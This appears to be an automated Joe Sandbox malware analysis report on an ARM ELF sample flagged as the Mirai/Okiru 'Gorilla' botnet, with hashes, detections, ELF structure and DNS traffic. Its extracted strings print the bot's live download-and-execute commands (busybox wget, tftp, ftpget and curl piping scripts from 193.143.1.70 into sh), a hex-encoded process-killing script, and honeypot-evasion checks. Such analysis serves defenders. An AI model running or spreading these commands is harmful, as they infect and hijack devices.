Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm6.nn.elf

Overview

General Information

Sample name:arm6.nn.elf
Analysis ID:1538225
MD5:836a0158a901f5659b8f779a54df7221
SHA1:0878e8a6ded1e6edf8dda91c409759dd5e42bfa0
SHA256:1789a8704a69fec5a1f096f751bd0c0c47d45b4c5de5f17dc4acc4465b2c446c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1538225
Start date and time:2024-10-20 20:49:54 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.nn.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@2/0
  • VT rate limit hit for: arm6.nn.elf
Command:/tmp/arm6.nn.elf
PID:5512
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • arm6.nn.elf (PID: 5512, Parent: 5437, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.nn.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm6.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    arm6.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: arm6.nn.elf PID: 5512JoeSecurity_OkiruYara detected OkiruJoe Security
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: arm6.nn.elfAvira: detected
            Source: arm6.nn.elfReversingLabs: Detection: 44%
            Source: arm6.nn.elfString: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login/proc/self/statusTracerPid/proc/1/cgroupkubepods/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot..../etc/motdw%s
            Source: arm6.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- | sh193.143.1.70GET /dlr. HTTP/1.0
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
            Source: arm6.nn.elfString found in binary or memory: http://193.143.1.70/
            Source: arm6.nn.elfString found in binary or memory: http://193.143.1.70/curl.sh
            Source: arm6.nn.elfString found in binary or memory: http://193.143.1.70/lol.sh
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendir/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/./fd/socket/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencodersystem/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresha
            Source: Initial sampleString containing 'busybox' found: usage: busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;
            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
            Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- | sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- | sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- | sh193.143.1.70GET /dlr. HTTP/1.0
            Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: classification engineClassification label: mal72.troj.linELF@0/0@2/0
            Source: /tmp/arm6.nn.elf (PID: 5512)Queries kernel information via 'uname': Jump to behavior
            Source: arm6.nn.elf, 5512.1.0000560fb28e9000.0000560fb2a17000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: arm6.nn.elf, 5512.1.00007ffc5752f000.00007ffc57550000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: arm6.nn.elf, 5512.1.0000560fb28e9000.0000560fb2a17000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
            Source: arm6.nn.elf, 5512.1.00007ffc5752f000.00007ffc57550000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.nn.elf
            Source: arm6.nn.elf, 5512.1.00007ffc5752f000.00007ffc57550000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: arm6.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: arm6.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm6.nn.elf PID: 5512, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: arm6.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: arm6.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5512.1.00007fce6c017000.00007fce6c032000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm6.nn.elf PID: 5512, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local System1
            Non-Application Layer Protocol
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            SourceDetectionScannerLabelLink
            arm6.nn.elf45%ReversingLabsLinux.Backdoor.Mirai
            arm6.nn.elf100%AviraEXP/ELF.Mirai.W
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            162.213.35.24
            truefalse
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://193.143.1.70/curl.sharm6.nn.elffalse
                unknown
                http://193.143.1.70/lol.sharm6.nn.elffalse
                  unknown
                  http://193.143.1.70/arm6.nn.elffalse
                    unknown
                    No contacted IP infos
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    daisy.ubuntu.comboatnet.spc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.x86.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    boatnet.arm.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    co.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 162.213.35.24
                    ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 162.213.35.24
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                    Entropy (8bit):6.154281632049989
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:arm6.nn.elf
                    File size:112'584 bytes
                    MD5:836a0158a901f5659b8f779a54df7221
                    SHA1:0878e8a6ded1e6edf8dda91c409759dd5e42bfa0
                    SHA256:1789a8704a69fec5a1f096f751bd0c0c47d45b4c5de5f17dc4acc4465b2c446c
                    SHA512:fd5176fc65c9ca92de32b2f8bc9a0bf9fc0da50ad35aa0500642676075aa85e4806113eee0d32e7e0543f6eee180447c805c26f763ea2050dba513c4fef9383b
                    SSDEEP:3072:p3P8EPFXaK0bvylPe9ba43qp1KnPLBnnPL7:9P8ukDye9a7iPl7
                    TLSH:85B32A47B881CB22C5C516BEFA1E028D332317B8D3DF72169D14AF25778A96B0D3BA45
                    File Content Preview:.ELF..............(.....T...4...........4. ...(.....................................................t...............Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../.t.............-.@0....S

                    ELF header

                    Class:ELF32
                    Data:2's complement, little endian
                    Version:1 (current)
                    Machine:ARM
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x8154
                    Flags:0x4000002
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:3
                    Section Header Offset:112104
                    Section Header Size:40
                    Number of Section Headers:12
                    Header String Table Index:11
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .initPROGBITS0x80940x940x100x00x6AX004
                    .textPROGBITS0x80b00xb00x174980x00x6AX0016
                    .finiPROGBITS0x1f5480x175480x100x00x6AX004
                    .rodataPROGBITS0x1f5580x175580x33700x00x2A008
                    .init_arrayINIT_ARRAY0x2b0040x1b0080x40x00x3WA004
                    .fini_arrayFINI_ARRAY0x2b0080x1b00c0x40x00x3WA004
                    .gotPROGBITS0x2b0100x1b0140x7c0x40x3WA004
                    .dataPROGBITS0x2b08c0x1b0900x4e80x00x3WA004
                    .bssNOBITS0x2b5740x1b5780x25500x00x3WA004
                    .ARM.attributesARM_ATTRIBUTES0x00x1b5780x100x00x0001
                    .shstrtabSTRTAB0x00x1b5880x5d0x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    LOAD0x00x80000x80000x1a8c80x1a8c86.21670x5R E0x8000.init .text .fini .rodata
                    LOAD0x1b0040x2b0040x2b0000x5740xaac05.42510x6RW 0x8000.init_array .fini_array .got .data .bss
                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 20, 2024 20:51:04.166615009 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:04.171559095 CEST53348008.8.8.8192.168.2.13
                    Oct 20, 2024 20:51:04.171646118 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:04.171646118 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:04.171711922 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:04.176548958 CEST53348008.8.8.8192.168.2.13
                    Oct 20, 2024 20:51:04.176563025 CEST53348008.8.8.8192.168.2.13
                    Oct 20, 2024 20:51:04.916204929 CEST53348008.8.8.8192.168.2.13
                    Oct 20, 2024 20:51:04.916352987 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:06.917336941 CEST53348008.8.8.8192.168.2.13
                    Oct 20, 2024 20:51:06.917645931 CEST3480053192.168.2.138.8.8.8
                    Oct 20, 2024 20:51:06.922485113 CEST53348008.8.8.8192.168.2.13
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Oct 20, 2024 20:51:04.171646118 CEST192.168.2.138.8.8.80x389cStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                    Oct 20, 2024 20:51:04.171711922 CEST192.168.2.138.8.8.80x9595Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 20, 2024 20:51:04.916204929 CEST8.8.8.8192.168.2.130x389cNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                    Oct 20, 2024 20:51:04.916204929 CEST8.8.8.8192.168.2.130x389cNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                    System Behavior

                    Start time (UTC):18:51:02
                    Start date (UTC):20/10/2024
                    Path:/tmp/arm6.nn.elf
                    Arguments:/tmp/arm6.nn.elf
                    File size:4956856 bytes
                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1